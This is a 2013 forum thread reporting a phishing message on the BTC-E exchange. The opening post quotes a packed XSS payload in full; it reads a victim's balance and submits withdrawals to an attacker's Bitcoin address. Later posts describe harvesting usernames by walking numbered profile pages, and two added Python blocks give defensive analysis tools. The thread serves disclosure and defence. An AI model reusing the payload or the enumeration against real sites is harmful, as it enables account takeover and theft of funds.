nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:35:36 PM
Hello, today I got a private message at BTC-E. This is the first strange thing since I didn't ever use the trollbox or used the PM system there. It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file. This downloads a script which seems to exploit an XSS vulnerability on BTC-E. eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("var wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo\";` K'l` P\"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P\"redir = \" http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg` _\"xmlhttp = false` /!btc_amount` *!lt` \")token` %!sec;try {` [&new XMLHttpRequest;} catch (e) {` </ActiveXObject(\"Msxml2.XMLHTTP\")` /Microsoft` K4document.location =`#E\";}}}func` /!postData(page, data, step`!=$if (`!B#)`!J%.open(\"POST\", ` U\"true);if (step == 1` E(nreadystatechange = handler1;} else ` Q(2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U$`$,8` a$set`&?#Header(\"Content-type\", \"appli` Y\"/x-www-form-urlencoded\");` T6X-` *#ed-With\", \"`'P*` R)nd(data)`!_@`&JE`&i%`%M$(evtXHR)`&V).`#M!State`$C$` 2(status`%z!00) {return`!}#1(`!LB`!:-2` Zm2` sT3` g``*K%\"../ajax/profile.php\", \"task=funds\", 4`!4S4`\"Em4`\"^T5`!#D`&\\A`&%, {`1`\"sponse =`1$$.` +$Tex`0m\"div = ` |%createElement(\"div\");div.innerHTML`!:!` _\"` 4!style.display = \"none\";` i%body.appendChild(div);`2%!`!-(get`!/#ById(\"` <!\").value`/>!` -!.length`.,!2) {`3&& = Math.floor(parseFloat(` p/sByClassName(\"money_btc\")[0]`\"@&)`0U\"` x'> 5`%>!`!))500;}`&zBedit%2Fhome\", 2`%UB`$o22`$#~`$D]sec`$g8s_email\"`#a\"!sec.checked`*\\1coins`#G$act=withdraw&sum=\" + `$,'+ \"&address` 6!wallet_btc` 6!coin_id=1&`&1!` >!` %!, 3`#ZX4`#jHl`!f%_rgx`#h'.match(/Balance: \\<b class='red'\\>([0-9]+.?` #!*)\\<\\/b\\> LTC/);` o& =` w+.slice(1` 6+`(D2` 9&`($#` I'> 
300`((!` \\)` 0!;}`$*c` p'`$Z3l`$b+8`$_.5`$KB`!N.billing`!N0_coin%2F1\", 1);")) According to Blockexplorer, significant amounts of BTC were already stolen: http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo
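The sample posted above is a script packed into a string and decoded by a small eval()'d unpacker, served from a URL that ends in .jpg. The following is an added example, not code from the thread or from BTC-E, showing how an analyst can triage such a fetch offline: it checks that a URL claiming to be an image actually returned image magic bytes, and it ports the unpacking routine visible in the post to Python so the payload can be read without ever executing it. The URL, HTML body and packed string below are constructed (the packed script is a harmless alert() followed by a backreference token); the token format is the one the posted unpacker implements.

```python
import re

# Magic-byte prefixes an honest image link should serve for its claimed extension.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
HTML_MARKERS = (b"<!doctype html", b"<html", b"<script", b"<body")

# Matches the eval((function(x){...})("...")) wrapper seen in the posted sample and
# captures the packed string literal (group 1), honouring backslash escapes inside it.
PACKED_RE = re.compile(rb'eval\(\(function\(x\)\{.*?\}\)\("((?:[^"\\]|\\.)*)"\)\)', re.S)


def claimed_extension(url: str) -> str:
    """Extension the URL advertises, lower-cased, or '' if the last path segment has none."""
    path = url.split("?", 1)[0].split("#", 1)[0]
    name = path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def classify_body(url: str, body: bytes) -> str:
    """'image' if the body carries the magic bytes its extension promises,
    'html-masquerading-as-image' if an image URL returned markup, else 'unknown'."""
    magics = IMAGE_MAGIC.get(claimed_extension(url), ())
    if any(body.startswith(m) for m in magics):
        return "image"
    head = body[:2048].lstrip().lower()
    if magics and any(marker in head for marker in HTML_MARKERS):
        return "html-masquerading-as-image"
    return "unknown"


def js_unescape(literal: str) -> str:
    """Undo the backslash escapes the wrapper needs inside its double-quoted literal."""
    return re.sub(r"\\(.)", r"\1", literal)


def unpack(x: str) -> str:
    """Static port of the unpacker the sample eval()s.
    Plain characters are copied through; a backtick introduces a four-character token
    whose last character encodes a length l = ord(c) - 28.  If l > 4 the token is a
    backreference copying l already-decoded characters, otherwise it is a literal backtick."""
    d = ""
    p = 0
    while p < len(x):
        if x[p] != "`":
            d += x[p]
            p += 1
            continue
        if p + 3 >= len(x):
            raise ValueError("truncated backreference token at offset %d" % p)
        l = ord(x[p + 3]) - 28
        if l > 4:
            start = len(d) - ord(x[p + 1]) * 96 - ord(x[p + 2]) + 3104 - l
            d += d[start:start + l]
        else:
            d += "`"
        p += 4
    return d


def triage(url: str, body: bytes):
    """Verdict on the fetched body plus the unpacked script, if a packed wrapper is present."""
    verdict = classify_body(url, body)
    m = PACKED_RE.search(body)
    payload = unpack(js_unescape(m.group(1).decode("latin-1"))) if m else None
    return verdict, payload


# Constructed sample (not the thread's URL or payload): a link that claims to be a
# chart image but serves HTML; its script is a harmless packed alert() whose second
# call is encoded as a backreference token ("`  +" copies the first 15 characters).
SAMPLE_URL = "http://images.example/charts/bitcoin_chart.jpg"
SAMPLE_BODY = (
    b"<html><body><script>"
    b'eval((function(x){var d="";/* unpacker elided */return d})("alert(\\"hello\\");`  +"))'
    b"</script></body></html>"
)

if __name__ == "__main__":
    print(triage(SAMPLE_URL, SAMPLE_BODY))
```

Fetching the body with wget from an isolated machine, as the OP did, and feeding the bytes to triage() keeps the analysis static: the unpacker is re-implemented rather than eval()'d, so the decoded script is only ever text.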
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:41:57 PM
(could an admin/moderator move this to the proper section please?)
maurits150
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:42:35 PM
I'm also interested how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.
dudeofthestick
Member
Offline
Activity: 78
Merit: 10
April 21, 2013, 06:46:36 PM
What operating system and browser version are you using? With versions, please.
Becher-Karl
Newbie
Offline
Activity: 48
Merit: 0
April 21, 2013, 06:52:09 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:52:58 PM
Quote from: dudeofthestick
What operating system and browser version are you using? With versions, please.

Browser? I prefer to use wget on a separate Linux box when someone wants me to click strange links...
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 06:54:34 PM
Quote from: Becher-Karl
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.

Trollbox is enabled in my account, but I never posted something there. However, I'm not 100% sure. Could have typed some bullshit there by accident.
optimator
April 21, 2013, 06:58:50 PM
Quote from: Becher-Karl
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.

Harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess.
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 07:10:45 PM
Looks like they have removed the attack scripts from the server. No problem, you have a copy here now.
bzh
Newbie
Offline
Activity: 34
Merit: 0
April 21, 2013, 07:15:10 PM
Quote from: Becher-Karl
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned). @nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all? If not, it would be really interesting to know how they could send you a PM.

Quote from: optimator
Harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess.

I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
samten
Newbie
Offline
Activity: 14
Merit: 0
April 21, 2013, 07:30:40 PM
don't trust strangers
optimator
April 21, 2013, 07:38:05 PM
Quote from: bzh
I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.

Bummer! That does lead one to the conclusion that there was inside help....
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 08:10:25 PM
You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever. Write a script that goes through all those numbers and have it send PMs. You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts.
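The post above explains how the username list can be assembled: public profile pages are numbered, so walking /profile/1, /profile/2, ... enumerates every account and its last-activity time. From the operator's side this pattern is visible in the web server's access log. The following is an added example, not code from the thread or from BTC-E, that flags clients which request many consecutive profile ids within a short window while leaving ordinary browsing alone. The log lines, IP addresses and thresholds are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Common Log Format line whose request targets a numbered profile page.
PROFILE_HIT_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /profile/(?P<pid>\d+)(?:[/?]\S*)? HTTP/[\d.]+" (?P<status>\d{3}) '
)


def parse_profile_hits(lines):
    """Group (timestamp, profile id) pairs per client IP; non-profile requests are ignored."""
    hits = defaultdict(list)
    for line in lines:
        m = PROFILE_HIT_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[m["ip"]].append((ts, int(m["pid"])))
    return hits


def busiest_window(events, window_seconds):
    """(distinct ids, fraction of consecutive id steps) for the densest window of one client.
    A scanner walking ids in order scores a fraction near 1.0; a human reading a few
    unrelated profiles scores low on both counts."""
    events = sorted(events)
    best = (0, 0.0)
    for i in range(len(events)):
        j = i
        while j + 1 < len(events) and (events[j + 1][0] - events[i][0]).total_seconds() <= window_seconds:
            j += 1
        ids = sorted({pid for _, pid in events[i:j + 1]})
        if len(ids) < 2:
            continue
        steps = sum(1 for a, b in zip(ids, ids[1:]) if b - a == 1)
        candidate = (len(ids), steps / (len(ids) - 1))
        if candidate > best:
            best = candidate
    return best


def detect_enumeration(lines, window_seconds=60, min_distinct=20, min_sequential=0.8):
    """Flag clients that fetch at least min_distinct profile ids inside one window with
    at least min_sequential of the id steps being +1 (thresholds are constructed defaults)."""
    flagged = {}
    for ip, events in parse_profile_hits(lines).items():
        distinct, frac = busiest_window(events, window_seconds)
        if distinct >= min_distinct and frac >= min_sequential:
            flagged[ip] = {"distinct_ids": distinct, "sequential_fraction": round(frac, 2)}
    return flagged


def build_sample_log():
    """Constructed access log: one client walking /profile/1..30 in 30 seconds, one
    ordinary user viewing three unrelated profiles (and a static asset) over several minutes."""
    lines = [
        f'203.0.113.7 - - [21/Apr/2013:18:00:{i:02d} +0000] "GET /profile/{i + 1} HTTP/1.1" 200 5120'
        for i in range(30)
    ]
    lines += [
        '198.51.100.9 - - [21/Apr/2013:18:01:10 +0000] "GET /profile/1042 HTTP/1.1" 200 5120',
        '198.51.100.9 - - [21/Apr/2013:18:03:05 +0000] "GET /profile/77 HTTP/1.1" 200 5120',
        '198.51.100.9 - - [21/Apr/2013:18:05:40 +0000] "GET /profile/1043 HTTP/1.1" 200 5120',
        '198.51.100.9 - - [21/Apr/2013:18:05:41 +0000] "GET /static/logo.png HTTP/1.1" 200 900',
    ]
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for ip, info in detect_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```

Sequential-id scoring, rather than a bare request-rate threshold, is what separates the harvester from a busy legitimate user: both may hit many pages, but only the scanner's ids form a run. Rate limiting profile views per client and not exposing last-activity timestamps on public pages reduce what such a walk yields.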
nsieugesug (OP)
Newbie
Offline
Activity: 7
Merit: 0
April 21, 2013, 08:40:09 PM
Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)? I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs.